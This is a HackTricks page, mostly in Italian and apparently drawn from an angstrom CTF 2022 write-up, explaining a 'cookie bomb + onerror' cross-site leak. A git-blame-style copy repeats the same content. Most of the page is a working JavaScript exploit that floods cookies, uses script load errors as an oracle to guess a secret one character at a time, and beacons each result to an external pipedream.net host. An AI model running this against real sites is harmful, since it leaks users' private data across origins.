hacktricks/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md

# Cookie Bomb + Onerror XS Leak

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

Il seguente **script** preso da [**qui**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) sfrutta una funzionalità che consente all'utente di **inserire qualsiasi quantità di cookie**, e poi caricare un file come script sapendo che la vera risposta sarà più grande di quella falsa e poi. Se ha successo, la risposta è un reindirizzamento con un URL risultante più lungo, **troppo grande per essere gestito dal server quindi restituisce un codice di stato http di errore**. Se la ricerca fallisce, non succederà nulla perché l'URL è breve.
```html
<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>
```
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.

</details>
{% endhint %}
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00			`# Cookie Bomb + Onerror XS Leak`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`{% endhint %}`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			Il seguente script preso da [qui](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) sfrutta una funzionalità che consente all'utente di inserire qualsiasi quantità di cookie, e poi caricare un file come script sapendo che la vera risposta sarà più grande di quella falsa e poi. Se ha successo, la risposta è un reindirizzamento con un URL risultante più lungo, troppo grande per essere gestito dal server quindi restituisce un codice di stato http di errore. Se la ricerca fallisce, non succederà nulla perché l'URL è breve.
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00			```html
			`<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>`
			`<script>`
Translated to Italian 2024-02-10 13:03:23 +00:00			`const $ = document.querySelector.bind(document);`
			`const sleep = (ms) => new Promise(r => setTimeout(r, ms));`
			`let i = 0;`
			`const stuff = async (len=3500) => {`
			`let name = Math.random();`
			`$("form").target = name;`
			`let w = window.open('', name);`
			`$("#f").value = "_".repeat(len);`
			`$("#f").name = i++;`
			`$("form").submit();`
			`await sleep(100);`
			`};`
			`const isError = async (url) => {`
			`return new Promise(r => {`
			`let script = document.createElement('script');`
			`script.src = url;`
			`script.onload = () => r(false);`
			`script.onerror = () => r(true);`
			`document.head.appendChild(script);`
			`});`
			`}`
			`const search = (query) => {`
			`return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));`
			`};`
			`const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";`
			`const url = "//en4u1nbmyeahu.x.pipedream.net/";`
			`let known = "actf{";`
			`window.onload = async () => {`
			`navigator.sendBeacon(url + "?load");`
			`await Promise.all([stuff(), stuff(), stuff(), stuff()]);`
			`await stuff(1600);`
			`navigator.sendBeacon(url + "?go");`
			`while (true) {`
			`for (let c of alphabet) {`
			`let query = known + c;`
			`if (await search(query)) {`
			`navigator.sendBeacon(url, query);`
			`known += c;`
			`break;`
			`}`
			`}`
			`}`
			`};`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00			`</script>`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`{% hint style="success" %}`
			`Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`<summary>Supporta HackTricks</summary>`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos su github.`
GitBook: [#3731] No subject 2023-01-02 23:15:01 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 16:24:40 +00:00			`{% endhint %}`